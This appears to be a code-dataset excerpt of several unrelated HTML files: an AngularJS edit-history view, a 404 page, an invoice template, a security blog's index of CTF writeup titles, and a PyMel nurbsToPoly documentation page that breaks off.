path
stringlengths
5
312
repo_name
stringlengths
5
116
content
stringlengths
2
1.04M
app/views/architect/historylog.html
uq-eresearch/qldarch-frontend
<div class="alert alert-warning" ng-show="(Auth.user.role === 'editor' || Auth.user.role === 'admin')&&architect.id" style="margin: 0;"> <div class="container"> <div> <button class="btn btn-default btn-xs" ui-sref="architect.summary.edit({ architectId: architect.id })"> <i class="fa fa-pencil"></i> Edit </button> <button class="btn btn-default btn-xs" ng-click="$parent.delete(architect)" ng-show="Auth.user.role === 'admin'"> <i class="fa fa-trash-o"></i> Delete </button> </div> </div> </div> <div class="l-frame l-frame-tight"> <div class="container"> <table class="table" ng-show="architectHistoryLog.length"> <tr> <th>User</th> <th>Created</th> <th>Changes</th> <th>Comment</th> </tr> <tr ng-repeat="log in architectHistoryLog | orderBy:'created'"> <td><strong>{{ log.email }}</strong> ({{ log.username }})</td> <td>{{ log.created }}</td> <td><pre ng-if="!log.diffValueChanges" ng-bind-html="log.diffValue" style="white-space: normal;"></pre> <pre ng-if="log.diffValueChanges" ng-bind-html="log.diffValueChanges" style="white-space: normal;"></pre></td> <td>{{ log.comment }}</td> </tr> </table> <p class="text-muted" ng-hide="architectHistoryLog.length">No history found</p> </div> </div>
web/texturelab.html
AlessandroBorges/IDX3D
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /~jason/rsi/idx3d/texturelab.html was not found on this server.</p> <hr> <address>Apache/2.2.15 (Red Hat) Server at frank.harvard.edu Port 80</address> </body></html>
views/work_invoices_edit.html
LaunchLab/LaunchLab
{% extends 'layout.html' %} {% block title %}LaunchLab New Project{% endblock %} {% block head %} {% parent %} {% endblock %} {% block content %} <div class="content-wrapper-top"> <div class="content"> <div class="pure-g" > <div class="l-box pure-u-1"> <h1 style="font-weight: 700; font-size: 2em; line-height: 0em; margin-top: 2em;"><i class="fa fa-fw fa-reorder " ></i> invoices overview</h1> <p style="color: #888; margin-left: 1em;"> {% include "./work_nav.html" %} </p> </div> </div> </div> <!-- start work dashboard --> <div class="ribbon l-box-lrg " style="background: rgb(255, 255, 255); color: #000;"> <div class="pure-g"> <!-- start project summary --> <div class="pure-u-2-3"> <h1>Invoice</h1> <p>Invoice ID: {{ invoice.id }}<br> Issue Date: {{ invoice.issuedate.toISOString() }}<br> Due Date: {{ invoice.duedate.toISOString() }}<br> Subject: <input value="{{ invoice.subject }}" > <p> status - issue date - ID - Client - Balance </p> <p> {% for invoice in invoices %} {{ invoice.status}} - - {{invoice.id }}<br> {% endfor %} //Draft - Not sent yet - 1 - company (project name) - R100,000.00<br> //Waiting - Yesterday 12:00 - 2 - company (project name) - R50,000.00<br> </p> </div> <!-- end project summary --> </div> </div> <!-- end work dashboard --> {% include "./footer.html" %} </div> {% endblock %}
posts/7/index.html
NitescuLucian/NitescuLucian.github.io
<!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="stylesheet" type="text/css" href="//cdnjs.cloudflare.com/ajax/libs/cookieconsent2/3.0.2/cookieconsent.min.css" /> <script async defer src="//cdnjs.cloudflare.com/ajax/libs/cookieconsent2/3.0.2/cookieconsent.min.js"></script> <script> window.addEventListener("load", function(){ window.cookieconsent.initialise({ "palette": { "popup": { "background": "#424242" }, "button": { "background": "#2a7ae2" } }, "content": { "href": "/privacy-policy" } })}); </script> <title>Lucian Nitescu</title> <meta name="description" content="Security Blog"> <link rel="stylesheet" href="/assets/main.css"> <link rel="canonical" href="https://nitesculucian.github.io/posts/7/"> <link rel="alternate" type="application/rss+xml" title="Lucian Nitescu" href="https://nitesculucian.github.io/feed.xml"> <meta name="flattr:id" content="njnwdo"> <!-- Hotjar Tracking Code for https://nitesculucian.github.io/ --> <script> (function(h,o,t,j,a,r){ h.hj=h.hj||function(){(h.hj.q=h.hj.q||[]).push(arguments)}; h._hjSettings={hjid:1067531,hjsv:6}; a=o.getElementsByTagName('head')[0]; r=o.createElement('script');r.async=1; r.src=t+h._hjSettings.hjid+j+h._hjSettings.hjsv; a.appendChild(r); })(window,document,'https://static.hotjar.com/c/hotjar-','.js?sv='); </script> <script async custom-element="amp-auto-ads" src="https://cdn.ampproject.org/v0/amp-auto-ads-0.1.js"> </script> <meta property="og:image" content="https://nitesculucian.github.io/uploads/logo.png"> <meta name="twitter:card" content="summary"> <meta name="twitter:title" content="Lucian Nitescu"> <meta name="twitter:description" content="Security Blog"> <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin> <link href="https://fonts.googleapis.com/css?family=Bitter:400,400i,700" rel="stylesheet"> <!-- Google Analytics --> <script> (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){ (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m) })(window,document,'script','//www.google-analytics.com/analytics.js','ga'); ga('create', 'UA-107695141-1', 'auto'); ga('send', 'pageview'); </script> </head> <body> <header class="site-header"> <div class="wrapper"> <a class="site-title" href="/">Lucian Nitescu</a> <nav class="site-nav"> <a class="page-link" href="/">Home</a> <a class="page-link" href="/about/">Whoami</a> <a class="page-link" href="/archives/">Archives</a> </nav> <br>Security Blog </div> </header> <main class="page-content" aria-label="Content"> <div class="wrapper"> <div class="home"> <ul class="post-list"> <li> <header class="post-header"> <h1 class="post-title"> <a class="post-link" href="/2018/10/31/attackdefense-com-pe-editing-gone-wrong/">AttackDefense.com [PE] - Editing Gone Wrong</a> </h1> <p class="post-meta"> Oct 31, 2018 • <a href="/categories/attackdefense-com/">AttackDefense.com</a>, <a href="/categories/ctf/">ctf</a>, <a href="/categories/writeups/">writeups</a>, <a href="/categories/privilegeescalation/">PrivilegeEscalation</a> </p> </header> <div class="post-content"> <p><img src="/uploads/Screenshot from 2018-10-26 17-44-27.png" alt="Image of AttackDefense 2018" /></p> </div> <p class="post-continue"> <a href="/2018/10/31/attackdefense-com-pe-editing-gone-wrong/">Read on &rarr;</a> </p> </li> <li> <header class="post-header"> <h1 class="post-title"> <a class="post-link" href="/2018/10/31/attackdefense-com-pe-permissions-matter/">AttackDefense.com [PE] - Permissions Matter!</a> </h1> <p class="post-meta"> Oct 31, 2018 • <a href="/categories/attackdefense-com/">AttackDefense.com</a>, <a href="/categories/ctf/">ctf</a>, <a href="/categories/writeups/">writeups</a>, <a href="/categories/privilegeescalation/">PrivilegeEscalation</a> </p> </header> <div class="post-content"> <p><img src="/uploads/Screenshot from 2018-10-26 17-44-27.png" alt="Image of AttackDefense 2018" /></p> </div> <p class="post-continue"> <a href="/2018/10/31/attackdefense-com-pe-permissions-matter/">Read on &rarr;</a> </p> </li> <li> <header class="post-header"> <h1 class="post-title"> <a class="post-link" href="/2018/10/28/attackdefense-com-rce-rpi-cam-control/">AttackDefense.com [RCE] - RPi Cam Control</a> </h1> <p class="post-meta"> Oct 28, 2018 • <a href="/categories/attackdefense-com/">AttackDefense.com</a>, <a href="/categories/ctf/">ctf</a>, <a href="/categories/writeups/">writeups</a>, <a href="/categories/rce/">rce</a> </p> </header> <div class="post-content"> <p><img src="/uploads/Screenshot from 2018-10-26 17-44-27.png" alt="Image of AttackDefense 2018" /></p> </div> <p class="post-continue"> <a href="/2018/10/28/attackdefense-com-rce-rpi-cam-control/">Read on &rarr;</a> </p> </li> <li> <header class="post-header"> <h1 class="post-title"> <a class="post-link" href="/2018/10/28/attackdefense-com-rce-php-utility-belt/">AttackDefense.com [RCE] - PHP Utility Belt</a> </h1> <p class="post-meta"> Oct 28, 2018 • <a href="/categories/attackdefense-com/">AttackDefense.com</a>, <a href="/categories/ctf/">ctf</a>, <a href="/categories/writeups/">writeups</a>, <a href="/categories/rce/">rce</a> </p> </header> <div class="post-content"> <p><img src="/uploads/Screenshot from 2018-10-26 17-44-27.png" alt="Image of AttackDefense 2018" /></p> </div> <p class="post-continue"> <a href="/2018/10/28/attackdefense-com-rce-php-utility-belt/">Read on &rarr;</a> </p> </li> <li> <header class="post-header"> <h1 class="post-title"> <a class="post-link" href="/2018/10/28/attackdefense-com-sxss-mybb-downloads-plugin/">AttackDefense.com [SXSS] - MyBB Downloads Plugin</a> </h1> <p class="post-meta"> Oct 28, 2018 • <a href="/categories/attackdefense-com/">AttackDefense.com</a>, <a href="/categories/ctf/">ctf</a>, <a href="/categories/writeups/">writeups</a>, <a href="/categories/storedxss/">StoredXSS</a> </p> </header> <div class="post-content"> <p><img src="/uploads/Screenshot from 2018-10-26 17-44-27.png" alt="Image of AttackDefense 2018" /></p> </div> <p class="post-continue"> <a href="/2018/10/28/attackdefense-com-sxss-mybb-downloads-plugin/">Read on &rarr;</a> </p> </li> </ul> <div class="pagination"> <a class="previous" href="/posts/8/">&laquo; Older</a> <a class="next" href="/posts/6/">Newer &raquo;</a> </div> </div> </div> </main> <footer class="site-footer"> <div class="wrapper"> <p> &copy; Lucian Nitescu - Powered by <a href="https://jekyllrb.com">Jekyll</a> &amp; <a href="https://github.com/yous/whiteglass">whiteglass</a> - Subscribe via <a href="https://nitesculucian.github.io/feed.xml">RSS</a> | <a href="/privacy-policy" >Privacy Policy</a> | <a href="/legal-disclaimer" >Legal Disclaimer</a> </p> </div> </footer> </body> </html>
PyMel.docset/Contents/Resources/Documents/generated/functions/pymel.core.modeling/pymel.core.modeling.nurbsToPoly.html
alexwidener/PyMelDocset
<html><body><p><!-- saved from url=(0024)http://docs.autodesk.com --> <!DOCTYPE html> <!-- Mirrored from help.autodesk.com/cloudhelp/2016/ENU/Maya-Tech-Docs/PyMel/generated/functions/pymel.core.modeling/pymel.core.modeling.nurbsToPoly.html by HTTrack Website Copier/3.x [XR&CO'2014], Sat, 01 Aug 2015 05:35:22 GMT --> <!-- Added by HTTrack --><meta content="text/html;charset=utf-8" http-equiv="content-type"/><!-- /Added by HTTrack --> </p> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"/> <title>pymel.core.modeling.nurbsToPoly — PyMEL 1.0.7 documentation</title> <link href="../../../_static/nature.css" rel="stylesheet" type="text/css"/> <link href="../../../_static/pygments.css" rel="stylesheet" type="text/css"/> <script type="text/javascript"> var DOCUMENTATION_OPTIONS = { URL_ROOT: '../../../', VERSION: '1.0.7', COLLAPSE_INDEX: false, FILE_SUFFIX: '.html', HAS_SOURCE: true }; </script> <script src="../../../_static/jquery.js" type="text/javascript"></script> <script src="../../../_static/underscore.js" type="text/javascript"></script> <script src="../../../_static/doctools.js" type="text/javascript"></script> <link href="../../../index-2.html" rel="top" title="PyMEL 1.0.7 documentation"/> <link href="../../pymel.core.modeling.html" rel="up" title="pymel.core.modeling"/> <link href="pymel.core.modeling.nurbsToPolygonsPref.html" rel="next" title="pymel.core.modeling.nurbsToPolygonsPref"/> <link href="pymel.core.modeling.nurbsSquare.html" rel="prev" title="pymel.core.modeling.nurbsSquare"/> <link href="../../../../style/adsk.cpm.css" rel="stylesheet" type="text/css"/><meta content="expert" name="experiencelevel"/><meta content="programmer" name="audience"/><meta content="enable" name="user-comments"/><meta content="ENU" name="language"/><meta content="MAYAUL" name="product"/><meta content="2016" name="release"/><meta content="Customization" name="book"/><meta content="Maya-Tech-Docs" name="component"/><meta content="/view/MAYAUL/2016/ENU/" name="helpsystempath"/><meta content="04/03/2015" name="created"/><meta content="04/03/2015" name="modified"/><meta content="Navigation index modules | next | previous | PyMEL 1.0.7 documentation » pymel.core.modeling » pymel.core.modeling.nurbsToPoly ¶ nurbsToPoly ( *args , **kwargs ) ¶ This command tesselates a NURBS surface and produces a polygonal surface. The name of the new polygonal surface is returned. If construction history is ON, then the name of the new dependency node is returned as well. Flags: Long Name / Short Name..." name="description"/><meta content="__PyMel_generated_functions_pymel_core_modeling_pymel_core_modeling_nurbsToPoly_html" name="topicid"/> <div class="related"> <h3>Navigation</h3> <ul> <li class="right" style="margin-right: 10px"> <a accesskey="I" href="../../../genindex.html" title="General Index">index</a></li> <li class="right"> <a href="../../../py-modindex.html" title="Python Module Index">modules</a> |</li> <li class="right"> <a accesskey="N" href="pymel.core.modeling.nurbsToPolygonsPref.html" title="pymel.core.modeling.nurbsToPolygonsPref">next</a> |</li> <li class="right"> <a accesskey="P" href="pymel.core.modeling.nurbsSquare.html" title="pymel.core.modeling.nurbsSquare">previous</a> |</li> <li><a href="../../../index-2.html">PyMEL 1.0.7 documentation</a> »</li> <li><a accesskey="U" href="../../pymel.core.modeling.html">pymel.core.modeling</a> »</li> </ul> </div> <div class="document"> <div class="documentwrapper"> <div class="bodywrapper"> <div class="body"> <div class="section" id="pymel-core-modeling-nurbstopoly"> <h1>pymel.core.modeling.nurbsToPoly<a class="headerlink" href="#pymel-core-modeling-nurbstopoly" title="Permalink to this headline">¶</a></h1> <dl class="function"> <dt id="pymel.core.modeling.nurbsToPoly"><a name="//apple_ref/cpp/Function/pymel.core.modeling.nurbsToPoly"></a> <tt class="descname">nurbsToPoly</tt><big>(</big><em>*args</em>, <em>**kwargs</em><big>)</big><a class="headerlink" href="#pymel.core.modeling.nurbsToPoly" title="Permalink to this definition">¶</a></dt> <dd><p>This command tesselates a NURBS surface and produces a polygonal surface. The name of the new polygonal surface is returned. If construction history is ON, then the name of the new dependency node is returned as well.</p> <p class="rubric">Flags:</p> <table border="1" class="docutils"> <colgroup> <col width="1%"></col> <col width="61%"></col> <col width="19%"></col> <col width="19%"></col> </colgroup> <thead valign="bottom"> <tr class="row-odd"><th class="head" colspan="2">Long Name / Short Name</th> <th class="head">Argument Types</th> <th class="head">Properties</th> </tr> </thead> <tbody valign="top"> <tr class="row-even"><td colspan="2"><tt class="docutils literal"><span class="pre">caching</span></tt> / <tt class="docutils literal"><span class="pre">cch</span></tt></td> <td><em>bool</em></td> <td> </td> </tr> <tr class="row-odd"><td> </td> <td colspan="3"> </td> </tr> <tr class="row-even"><td colspan="2"><tt class="docutils literal"><span class="pre">chordHeight</span></tt> / <tt class="docutils literal"><span class="pre">cht</span></tt></td> <td><em>float</em></td> <td><img alt="../../../_images/query.gif" class="first" src="../../../_images/query.gif"/> <img alt="../../../_images/edit.gif" class="last" src="../../../_images/edit.gif"/> </td> </tr> <tr class="row-odd"><td> </td> <td colspan="3"><p class="first">Chord height is the absolute distance in OBJECT space which the center of a polygon edge can deviate from the actual center of the surface span. Only used if Format is General and if useChordHeight is true. Default:0.1</p> <blockquote class="last"> <div></div></blockquote> </td> </tr> <tr class="row-even"><td colspan="2"><tt class="docutils literal"><span class="pre">chordHeightRatio</span></tt> / <tt class="docutils literal"><span class="pre">chr</span></tt></td> <td><em>float</em></td> <td><img alt="../../../_images/query.gif" class="first" src="../../../_images/query.gif"/> <img alt="../../../_images/edit.gif" class="last" src="../../../_images/edit.gif"/> </td> </tr> <tr class="row-odd"><td> </td> <td colspan="3"><p class="first">Chord height ratio is the ratio of the chord length of a surface span to the chord height. (This is a length to height ratio). 0 is a very loose fit. 1 is a very tight fit. (See also description of chord height.) Always used if Format is Standard Fit. Otherwise, only used if Format is General and useChordHeightRatio is true. Default:0.9</p> <blockquote class="last"> <div></div></blockquote> </td> </tr> <tr class="row-even"><td colspan="2"><tt class="docutils literal"><span class="pre">constructionHistory</span></tt> / <tt class="docutils literal"><span class="pre">ch</span></tt></td> <td><em>bool</em></td> <td><img alt="../../../_images/create.gif" class="first last" src="../../../_images/create.gif"/> </td> </tr> <tr class="row-odd"><td> </td> <td colspan="3"><dl class="first last docutils"> <dt>Turn the construction history on or off</dt> <dd></dd> </dl> </td> </tr> <tr class="row-even"><td colspan="2"><tt class="docutils literal"><span class="pre">curvatureTolerance</span></tt> / <tt class="docutils literal"><span class="pre">cvt</span></tt></td> <td><em>int</em></td> <td> </td> </tr> <tr class="row-odd"><td> </td> <td colspan="3"> </td> </tr> <tr class="row-even"><td colspan="2"><tt class="docutils literal"><span class="pre">delta</span></tt> / <tt class="docutils literal"><span class="pre">d</span></tt></td> <td><em>float</em></td> <td><img alt="../../../_images/query.gif" class="first" src="../../../_images/query.gif"/> <img alt="../../../_images/edit.gif" class="last" src="../../../_images/edit.gif"/> </td> </tr> <tr class="row-odd"><td> </td> <td colspan="3"><dl class="first last docutils"> <dt>3D delta. Only used if Format is Standard Fit. Default:0.1</dt> <dd></dd> </dl> </td> </tr> <tr class="row-even"><td colspan="2"><tt class="docutils literal"><span class="pre">edgeSwap</span></tt> / <tt class="docutils literal"><span class="pre">es</span></tt></td> <td><em>bool</em></td> <td><img alt="../../../_images/query.gif" class="first" src="../../../_images/query.gif"/> <img alt="../../../_images/edit.gif" class="last" src="../../../_images/edit.gif"/> </td> </tr> <tr class="row-odd"><td> </td> <td colspan="3"><p class="first">Edge swap. This attribute enables an algorithm which determines the optimal method with which to tessellate a quadrilateral into triangles. Only used if Format is General. Default:false</p> <blockquote class="last"> <div></div></blockquote> </td> </tr> <tr class="row-even"><td colspan="2"><tt class="docutils literal"><span class="pre">explicitTessellationAttributes</span></tt> / <tt class="docutils literal"><span class="pre">eta</span></tt></td> <td><em>bool</em></td> <td> </td> </tr> <tr class="row-odd"><td> </td> <td colspan="3"> </td> </tr> <tr class="row-even"><td colspan="2"><tt class="docutils literal"><span class="pre">format</span></tt> / <tt class="docutils literal"><span class="pre">f</span></tt></td> <td><em>int</em></td> <td><img alt="../../../_images/query.gif" class="first" src="../../../_images/query.gif"/> <img alt="../../../_images/edit.gif" class="last" src="../../../_images/edit.gif"/> </td> </tr> <tr class="row-odd"><td> </td> <td colspan="3"><dl class="first last docutils"> <dt>Format: 0 - Triangle Count, 1 - Standard Fit, 2 - General, 3 - CVs Default:1</dt> <dd></dd> </dl> </td> </tr> <tr class="row-even"><td colspan="2"><tt class="docutils literal"><span class="pre">fractionalTolerance</span></tt> / <tt class="docutils literal"><span class="pre">ft</span></tt></td> <td><em>float</em></td> <td><img alt="../../../_images/query.gif" class="first" src="../../../_images/query.gif"/> <img alt="../../../_images/edit.gif" class="last" src="../../../_images/edit.gif"/> </td> </tr> <tr class="row-odd"><td> </td> <td colspan="3"><dl class="first last docutils"> <dt>Fractional tolerance. Only used if Format is Standard Fit. Default:0.01</dt> <dd></dd> </dl> </td> </tr> <tr class="row-even"><td colspan="2"><tt class="docutils literal"><span class="pre">frozen</span></tt> / <tt class="docutils literal"><span class="pre">fzn</span></tt></td> <td><em>bool</em></td> <td> </td> </tr> <tr class="row-odd"><td> </td> <td colspan="3"> </td> </tr> <tr class="row-even"><td colspan="2"><tt class="docutils literal"><span class="pre">matchNormalDir</span></tt> / <tt class="docutils literal"><span class="pre">mnd</span></tt></td> <td><em>bool</em></td> <td><img alt="../../../_images/query.gif" class="first" src="../../../_images/query.gif"/> <img alt="../../../_images/edit.gif" class="last" src="../../../_images/edit.gif"/> </td> </tr> <tr class="row-odd"><td> </td> <td colspan="3"><dl class="first last docutils"> <dt>Only used when the format is CVs. Order the cvs so that the normal matches the direction of the original surface if set to true. Default:false</dt> <dd></dd> </dl> </td> </tr> <tr class="row-even"><td colspan="2"><tt class="docutils literal"><span class="pre">matchRenderTessellation</span></tt> / <tt class="docutils literal"><span class="pre">mrt</span></tt></td> <td><em>bool</em></td> <td> </td> </tr> <tr class="row-odd"><td> </td> <td colspan="3"> </td> </tr> <tr class="row-even"><td colspan="2"><tt class="docutils literal"><span class="pre">minEdgeLength</span></tt> / <tt class="docutils literal"><span class="pre">mel</span></tt></td> <td><em>float</em></td> <td><img alt="../../../_images/query.gif" class="first" src="../../../_images/query.gif"/> <img alt="../../../_images/edit.gif" class="last" src="../../../_images/edit.gif"/> </td> </tr> <tr class="row-odd"><td> </td> <td colspan="3"><dl class="first last docutils"> <dt>Minimal edge length. Only used if Format is Standard Fit. Default:0.001</dt> <dd></dd> </dl> </td> </tr> <tr class="row-even"><td colspan="2"><tt class="docutils literal"><span class="pre">name</span></tt> / <tt class="docutils literal"><span class="pre">n</span></tt></td> <td><em>unicode</em></td> <td><img alt="../../../_images/create.gif" class="first last" src="../../../_images/create.gif"/> </td> </tr> <tr class="row-odd"><td> </td> <td colspan="3"><dl class="first last docutils"> <dt>Name the resulting object</dt> <dd></dd> </dl> </td> </tr> <tr class="row-even"><td colspan="2"><tt class="docutils literal"><span class="pre">nodeState</span></tt> / <tt class="docutils literal"><span class="pre">nds</span></tt></td> <td><em>int</em></td> <td> </td> </tr> <tr class="row-odd"><td> </td> <td colspan="3"> </td> </tr> <tr class="row-even"><td colspan="2"><tt class="docutils literal"><span class="pre">normalizeTrimmedUVRange</span></tt> / <tt class="docutils literal"><span class="pre">ntr</span></tt></td> <td><em>bool</em></td> <td><img alt="../../../_images/query.gif" class="first" src="../../../_images/query.gif"/> <img alt="../../../_images/edit.gif" class="last" src="../../../_images/edit.gif"/> </td> </tr> <tr class="row-odd"><td> </td> <td colspan="3"><p class="first">This attribute is only applicable when a trimmed NURBS surface is used as the input surface. When true, the UV texture coordinates on the trimmed input surface are normalized and applied to the output surface as they are for the untrimmed version of the input surface. (The texture coordinates on the entire untrimmed surface are mapped to the entire output surface.) When false, the UV texture coordinates on the trimmed input surface are applied to the output surface as they are for the trimmed input surface. (Only the texture coordinates visible on the trimmed input surface are mapped to the output surface.) Default:true Common flags</p> <blockquote class="last"> <div></div></blockquote> </td> </tr> <tr class="row-even"><td colspan="2"><tt class="docutils literal"><span class="pre">object</span></tt> / <tt class="docutils literal"><span class="pre">o</span></tt></td> <td><em>bool</em></td> <td><img alt="../../../_images/create.gif" class="first last" src="../../../_images/create.gif"/> </td> </tr> <tr class="row-odd"><td> </td> <td colspan="3"><dl class="first last docutils"> <dt>Create the result, or just the dependency node Flag can have multiple arguments, passed either as a tuple or a list.</dt> <dd></dd> </dl> </td> </tr> <tr class="row-even"><td colspan="2"><tt class="docutils literal"><span class="pre">polygonCount</span></tt> / <tt class="docutils literal"><span class="pre">pc</span></tt></td> <td><em>int</em></td> <td><img alt="../../../_images/query.gif" class="first" src="../../../_images/query.gif"/> <img alt="../../../_images/edit.gif" class="last" src="../../../_images/edit.gif"/> </td> </tr> <tr class="row-odd"><td> </td> <td colspan="3"><dl class="first last docutils"> <dt>The number of polygons to produce. Only used if Format is Triangle Count. Default:200</dt> <dd></dd> </dl> </td> </tr> <tr class="row-even"><td colspan="2"><tt class="docutils literal"><span class="pre">polygonType</span></tt> / <tt class="docutils literal"><span class="pre">pt</span></tt></td> <td><em>int</em></td> <td><img alt="../../../_images/query.gif" class="first" src="../../../_images/query.gif"/> <img alt="../../../_images/edit.gif" class="last" src="../../../_images/edit.gif"/> </td> </tr> <tr class="row-odd"><td> </td> <td colspan="3"><dl class="first last docutils"> <dt>Polygon type: 0 - Triangles, 1 - Quads Default:0</dt> <dd></dd> </dl> </td> </tr> <tr class="row-even"><td colspan="2"><tt class="docutils literal"><span class="pre">smoothEdge</span></tt> / <tt class="docutils literal"><span class="pre">ues</span></tt></td> <td><em>bool</em></td> <td> </td> </tr> <tr class="row-odd"><td> </td> <td colspan="3"> </td> </tr> <tr class="row-even"><td colspan="2"><tt class="docutils literal"><span class="pre">smoothEdgeRatio</span></tt> / <tt class="docutils literal"><span class="pre">esr</span></tt></td> <td><em>float</em></td> <td> </td> </tr> <tr class="row-odd"><td> </td> <td colspan="3"> </td> </tr> <tr class="row-even"><td colspan="2"><tt class="docutils literal"><span class="pre">uDivisionsFactor</span></tt> / <tt class="docutils literal"><span class="pre">nuf</span></tt></td> <td><em>float</em></td> <td> </td> </tr> <tr class="row-odd"><td> </td> <td colspan="3"> </td> </tr> <tr class="row-even"><td colspan="2"><tt class="docutils literal"><span class="pre">uNumber</span></tt> / <tt class="docutils literal"><span class="pre">un</span></tt></td> <td><em>int</em></td> <td><img alt="../../../_images/query.gif" class="first" src="../../../_images/query.gif"/> <img alt="../../../_images/edit.gif" class="last" src="../../../_images/edit.gif"/> </td> </tr> <tr class="row-odd"><td> </td> <td colspan="3"><dl class="first last docutils"> <dt>Initial number of isoparms in U. Used in conjunction with the uType attribute. Only used if Format is General. Default:3</dt> <dd></dd> </dl> </td> </tr> <tr class="row-even"><td colspan="2"><tt class="docutils literal"><span class="pre">uType</span></tt> / <tt class="docutils literal"><span class="pre">ut</span></tt></td> <td><em>int</em></td> <td><img alt="../../../_images/query.gif" class="first" src="../../../_images/query.gif"/> <img alt="../../../_images/edit.gif" class="last" src="../../../_images/edit.gif"/> </td> </tr> <tr class="row-odd"><td> </td> <td colspan="3"><p class="first">Initial U type tessellation criteria (3 types). Type 0 - Per surface # of isoparms in 3D. This type places a specific number of iso-parametric subdivision lines across the surface, equally spaced in 3D space. Type 1 - Per surface # of isoparms. This type places a specific number of iso-parametric subdivision lines across the surface, equally spaced in parameter space. Type 2 - Per span # of isoparms. This type places a specific number of iso-parametric subdivision lines across each surface span, equally spaced in parameter space. (This is the closest option to the Alias Studio tessellation parameters.) This attribute is only used if Format is General. Default:3</p> <blockquote class="last"> <div></div></blockquote> </td> </tr> <tr class="row-even"><td colspan="2"><tt class="docutils literal"><span class="pre">useChordHeight</span></tt> / <tt class="docutils literal"><span class="pre">uch</span></tt></td> <td><em>bool</em></td> <td><img alt="../../../_images/query.gif" class="first" src="../../../_images/query.gif"/> <img alt="../../../_images/edit.gif" class="last" src="../../../_images/edit.gif"/> </td> </tr> <tr class="row-odd"><td> </td> <td colspan="3"><dl class="first last docutils"> <dt>True means use chord height. Only used if Format is General. Default:false</dt> <dd></dd> </dl> </td> </tr> <tr class="row-even"><td colspan="2"><tt class="docutils literal"><span class="pre">useChordHeightRatio</span></tt> / <tt class="docutils literal"><span class="pre">ucr</span></tt></td> <td><em>bool</em></td> <td><img alt="../../../_images/query.gif" class="first" src="../../../_images/query.gif"/> <img alt="../../../_images/edit.gif" class="last" src="../../../_images/edit.gif"/> </td> </tr> <tr class="row-odd"><td> </td> <td colspan="3"><dl class="first last docutils"> <dt>True means use chord height ratio. Default:true</dt> <dd></dd> </dl> </td> </tr> <tr class="row-even"><td colspan="2"><tt class="docutils literal"><span class="pre">useSurfaceShader</span></tt> / <tt class="docutils literal"><span class="pre">uss</span></tt></td> <td><em>bool</em></td> <td> </td> </tr> <tr class="row-odd"><td> </td> <td colspan="3"> </td> </tr> <tr class="row-even"><td colspan="2"><tt class="docutils literal"><span class="pre">vDivisionsFactor</span></tt> / <tt class="docutils literal"><span class="pre">nvf</span></tt></td> <td><em>float</em></td> <td> </td> </tr> <tr class="row-odd"><td> </td> <td colspan="3"> </td> </tr> <tr class="row-even"><td colspan="2"><tt class="docutils literal"><span class="pre">vNumber</span></tt> / <tt class="docutils literal"><span class="pre">vn</span></tt></td> <td><em>int</em></td> <td><img alt="../../../_images/query.gif" class="first" src="../../../_images/query.gif"/> <img alt="../../../_images/edit.gif" class="last" src="../../../_images/edit.gif"/> </td> </tr> <tr class="row-odd"><td> </td> <td colspan="3"><dl class="first last docutils"> <dt>Initial number of isoparms in V. Used in conjunction with the vType attribute. Only used if Format is General. Default:3</dt> <dd></dd> </dl> </td> </tr> <tr class="row-even"><td colspan="2"><tt class="docutils literal"><span class="pre">vType</span></tt> / <tt class="docutils literal"><span class="pre">vt</span></tt></td> <td><em>int</em></td> <td><img alt="../../../_images/query.gif" class="first" src="../../../_images/query.gif"/> <img alt="../../../_images/edit.gif" class="last" src="../../../_images/edit.gif"/> </td> </tr> <tr class="row-odd"><td> </td> <td colspan="3"><dl class="first last docutils"> <dt>Initial V type tessellation criteria (3 types). See description for the uType attribute. Only used if Format is General. Default:3</dt> <dd></dd> </dl> </td> </tr> </tbody> </table> <p>Derived from mel command <tt class="xref py py-obj docutils literal"><span class="pre">maya.cmds.nurbsToPoly</span></tt></p> <p class="rubric">Example:</p> <div class="highlight-python"><div class="highlight"><pre><span class="kn">import</span> <span class="nn">pymel.core</span> <span class="kn">as</span> <span class="nn">pm</span> <span class="c"># To create a new polygonal surface from a NURBS surface:</span> <span class="n">pm</span><span class="o">.</span><span class="n">nurbsToPoly</span><span class="p">(</span> <span class="s">'nurbsSphere1'</span> <span class="p">)</span> <span class="c"># To create a new polygonal surface from a NURBS surface with</span> <span class="c"># history so that the tesselation can be edited afterwards:</span> <span class="n">pm</span><span class="o">.</span><span class="n">nurbsToPoly</span><span class="p">(</span> <span class="s">'nurbsSphere1'</span><span class="p">,</span> <span class="n">ch</span><span class="o">=</span><span class="bp">True</span> <span class="p">)</span> </pre></div> </div> </dd></dl> </div> </div> </div> </div> <div class="sphinxsidebar"> <div class="sphinxsidebarwrapper"> <h4>Previous topic</h4> <p class="topless"><a href="pymel.core.modeling.nurbsSquare.html" title="previous chapter">pymel.core.modeling.nurbsSquare</a></p> <h4>Next topic</h4> <p class="topless"><a href="pymel.core.modeling.nurbsToPolygonsPref.html" title="next chapter">pymel.core.modeling.nurbsToPolygonsPref</a></p> <h3><a href="../../../modules.html">Core Modules</a></h3> <ul> <li><a class="reference external" href="../../pymel.core.animation.html#module-pymel.core.animation"><tt class="xref">animation</tt></a></li> <li><a class="reference external" href="../../pymel.core.effects.html#module-pymel.core.effects"><tt class="xref">effects</tt></a></li> <li><a class="reference external" href="../../pymel.core.general.html#module-pymel.core.general"><tt class="xref">general</tt></a></li> <li><a class="reference external" href="../../pymel.core.language.html#module-pymel.core.language"><tt class="xref">language</tt></a></li> <li><a class="reference external" href="../../pymel.core.modeling.html#module-pymel.core.modeling"><tt class="xref">modeling</tt></a></li> <li><a class="reference external" href="../../pymel.core.rendering.html#module-pymel.core.rendering"><tt class="xref">rendering</tt></a></li> <li><a class="reference external" href="../../pymel.core.system.html#module-pymel.core.system"><tt class="xref">system</tt></a></li> <li><a class="reference external" href="../../pymel.core.windows.html#module-pymel.core.windows"><tt 